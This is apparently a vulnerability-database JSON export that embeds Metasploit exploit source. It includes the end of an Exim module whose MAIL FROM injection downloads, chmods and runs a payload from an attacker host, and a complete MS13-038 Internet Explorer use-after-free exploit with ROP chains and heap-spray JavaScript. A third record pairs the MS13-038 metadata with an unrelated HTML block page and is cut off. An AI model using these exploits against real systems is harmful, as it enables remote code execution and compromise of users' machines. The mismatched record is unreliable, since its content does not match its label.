Exim!\")\n end\n\n ehlo = datastore['EHLO']\n ehlo_resp = raw_send_recv(\"EHLO #{ehlo}\\r\\n\")\n ehlo_resp.each_line do |line|\n print_status(\"#{rhost}:#{rport} - EHLO: #{line.strip}\")\n end\n\n #\n # Initiate the message\n #\n filename = rand_text_alpha_lower(8)\n from = rand_text_alpha(3)\n from << \"`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`\"\n from << \"`chmod${IFS}+x${IFS}/tmp/#{filename}`\"\n from << \"`/tmp/#{filename}`\"\n from << \"@#{ehlo}\"\n to = datastore['MAILTO']\n\n resp = raw_send_recv(\"MAIL FROM: #{from}\\r\\n\")\n resp ||= 'no response'\n msg = \"MAIL: #{resp.strip}\"\n if not resp or resp[0,3] != '250'\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - #{msg}\")\n else\n print_status(\"#{rhost}:#{rport} - #{msg}\")\n end\n\n resp = raw_send_recv(\"RCPT TO: #{to}\\r\\n\")\n resp ||= 'no response'\n msg = \"RCPT: #{resp.strip}\"\n if not resp or resp[0,3] != '250'\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - #{msg}\")\n else\n print_status(\"#{rhost}:#{rport} - #{msg}\")\n end\n\n resp = raw_send_recv(\"DATA\\r\\n\")\n resp ||= 'no response'\n msg = \"DATA: #{resp.strip}\"\n if not resp or resp[0,3] != '354'\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - #{msg}\")\n else\n print_status(\"#{rhost}:#{rport} - #{msg}\")\n end\n\n message = \"Subject: test\\r\\n\"\n message << \"\\r\\n\"\n message << \".\\r\\n\"\n\n resp = raw_send_recv(message)\n msg = \"DELIVER: #{resp.strip}\"\n if not resp or resp[0,3] != '250'\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - #{msg}\")\n else\n print_status(\"#{rhost}:#{rport} - #{msg}\")\n end\n disconnect\n\n # wait for payload download\n if (datastore['DOWNHOST'])\n print_status(\"#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload\")\n select(nil, nil, nil, datastore['HTTP_DELAY'])\n else\n wait_linux_payload\n end\n register_file_for_cleanup(\"/tmp/#{filename}\")\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-22T11:24:28", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "f78b81be9ef5cef8ddee187a9e7948cc", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-06-22T12:28:47", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2019-06-22T12:28:47"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-58238", "SMNTC-59162", "SMNTC-50218", "SMNTC-38195"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-038.NASL", "SMB_KB2847140.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "saint", "idList": ["SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-06-22T12:28:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-22T12:28:47", "differentElements": ["sourceData"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "bd997ec760325332ba83c574e6daff9a", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-07-13T00:28:14", "history": [], "viewCount": 122, "enchantments": {"score": {"value": 9.1, "vector": "NONE", "modified": "2019-07-13T00:28:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "seebug", "idList": ["SSV:60781", "SSV:60790"]}, {"type": "symantec", "idList": ["SMNTC-59641", "SMNTC-58238", "SMNTC-59162", "SMNTC-50218", "SMNTC-38195"]}, {"type": "nessus", "idList": ["SMB_NT_MS13-038.NASL", "SMB_KB2847140.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C"]}, {"type": "saint", "idList": ["SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "SAINT:530FA87FA097C35D9629E058CE3C1589"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2019-07-13T00:28:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<meta charset=\"utf-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\t\t<title>Block page</title>\n\t\t<link rel=\"stylesheet\" type=\"text/css\" href=\"https://kliksafestoppagina.kliksafe.nl/2017ns/css/Font/Fonts.css\">\n\t\t<link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.8.2/css/all.css\" integrity=\"sha384-oS3vJWv+0UjzBfQzYUhtDYW+Pj2yciDJxpsK1OYPAYjqT085Qq/1cq5FLXAZQ7Ay\" crossorigin=\"anonymous\">\n\t\t<style>\n\t\t\thtml,body \t{\n\t\t\t\t\t\tbackground-color:#444;\n\t\t\t\t\t\tcolor:#FFF;\n\t\t\t\t\t\theight: 100%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tpadding: 0px;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tfont-size: 20px;\n\t\t\t\t\t\t}\n\t\t\t.header \t{\n\t\t\t\t\t\theight: 50%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tbackground: url('data:image/jpeg;base64,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